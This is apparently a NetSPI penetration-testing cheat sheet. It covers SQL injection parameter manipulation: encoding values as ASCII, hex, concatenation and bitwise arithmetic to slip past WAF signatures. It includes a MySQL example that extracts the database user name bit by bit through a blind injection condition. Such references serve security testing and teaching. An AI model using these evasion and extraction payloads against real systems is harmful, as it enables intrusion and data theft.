Parameter Manipulation

Rewriting the values inside an injected query (spelling characters as ASCII codes or hex, building strings by concatenation instead of quoting them, replacing comparisons with bitwise arithmetic) helps bypass Web Application Firewalls and anti-virus scanners that match on fixed signatures, and lets a query be adapted to the constraints of an unusual injection point. Function and operator support differs between database engines (Oracle, for example, has no &, |, ~ or ^ operators and uses BITAND() and || instead, and SQL Server has no unsigned cast), so verify each construct against the target before relying on it in a payload.

Description          Query
ASCII > Char         SELECT char(65)
Char > ASCII         SELECT ascii('A')
Hex > Int            SELECT 0x20 + 0x40
Bitwise AND          SELECT 6 & 2
Bitwise OR           SELECT 6 | 2
Bitwise Negation     SELECT ~6
Bitwise XOR          SELECT 6 ^ 2
Right Shift          SELECT 6 >> 2
Left Shift           SELECT 6 << 2
Substring            SELECT substr('abcd', 3, 2)
                     substr(string, index, length); index is 1-based, so this returns 'cd'
Casting              SELECT cast('1' AS unsigned integer)
                     SELECT cast('123' AS char)
Concatenation        SELECT concat('net','spi')
                     SELECT 'n' 'et' 'spi'

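Worked example, added here and not part of the original cheat sheet. It is written in the MySQL dialect, so it assumes a MySQL target and MySQL's built-in user() function; the column aliases are arbitrary. It shows how the primitives in the table combine: the first query spells the string 'netspi' six ways that a filter matching the literal would treat as different, the second spells the integer 96 four ways, and the third reads a single bit of the first character of the connected account name, which is the building block of bit-by-bit blind extraction.

```sql
-- Added example (MySQL dialect); not code from the original cheat sheet.
-- Every column in this query evaluates to the string 'netspi'. A filter
-- that looks for the quoted literal sees only the first spelling.
SELECT 'netspi'                                   AS plain_literal,
       'net' 'spi'                                AS adjacent_literals,
       concat('net', 'spi')                       AS concat_call,
       char(110, 101, 116, 115, 112, 105)         AS from_ascii_codes,
       char(0x6e, 0x65, 0x74, 0x73, 0x70, 0x69)   AS from_hex_codes,
       0x6e6574737069                             AS hex_string_literal;

-- The same integer, 96, written with hex arithmetic, a cast, a shift and a
-- mask. Useful when the digits or operators of the obvious form are blocked.
SELECT 0x20 + 0x40                                AS hex_sum,
       cast('96' AS unsigned integer)             AS cast_from_string,
       6 << 4                                     AS shifted,
       0x7f & 0x60                                AS masked;

-- Blind extraction one bit at a time. substr() is 1-based, so this takes
-- the first character of the current account name (user() is MySQL
-- specific), converts it to its ASCII code and isolates bit 6 with a
-- right shift and an AND mask. Repeating for bits 0 through 6 recovers the
-- character with seven true/false queries and no comparison operator or
-- quoted string in the payload.
SELECT (ascii(substr(user(), 1, 1)) >> 6) & 1    AS bit6_of_first_char;
```

Run each SELECT against a MySQL instance to confirm the equivalences before using a spelling in a payload. In an injection context the last expression is appended as a boolean condition, for example `AND ((ascii(substr(user(),1,1))>>6)&1)`, and the responses for bits 0 through 6 are assembled into the character. The FROM DUAL and substring() tables below follow the same pattern, with the caveat that operator and function support differs between engines.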

Parameter Manipulation (FROM DUAL variant)

The same table for engines that require a FROM clause on every SELECT, written against the DUAL dummy table.

Description          Query
ASCII > Char         SELECT char(65) from dual
Char > ASCII         SELECT ascii('A') from dual
Bitwise AND          SELECT 6 & 2 from dual
Bitwise OR           SELECT 6 | 2 from dual
Bitwise Negation     SELECT ~6 from dual
Bitwise XOR          SELECT 6 ^ 2 from dual
Substring            SELECT substr('abcd', 3, 2) from dual
                     substr(string, index, length); index is 1-based, so this returns 'cd'
Casting              SELECT CAST(12 AS CHAR(32)) from dual
Concatenation        SELECT concat('net','spi') from dual
                     SELECT 'n' 'et' 'spi' from dual

Parameter Manipulation (substring() variant)

The same table for engines that spell the substring function substring() rather than substr().

Description          Query
ASCII > Char         SELECT char(65)
Char > ASCII         SELECT ascii('A')
Hex > Int            SELECT 0x20 + 0x40
Bitwise AND          SELECT 6 & 2
Bitwise OR           SELECT 6 | 2
Bitwise Negation     SELECT ~6
Bitwise XOR          SELECT 6 ^ 2
Substring            SELECT substring('abcd', 3, 2)
                     substring(string, index, length); index is 1-based, so this returns 'cd'
Casting              SELECT cast('1' AS unsigned integer)
                     SELECT cast('123' AS char)
Concatenation        SELECT concat('net','spi')

© 2018 Copyright by NetSPI. All rights reserved.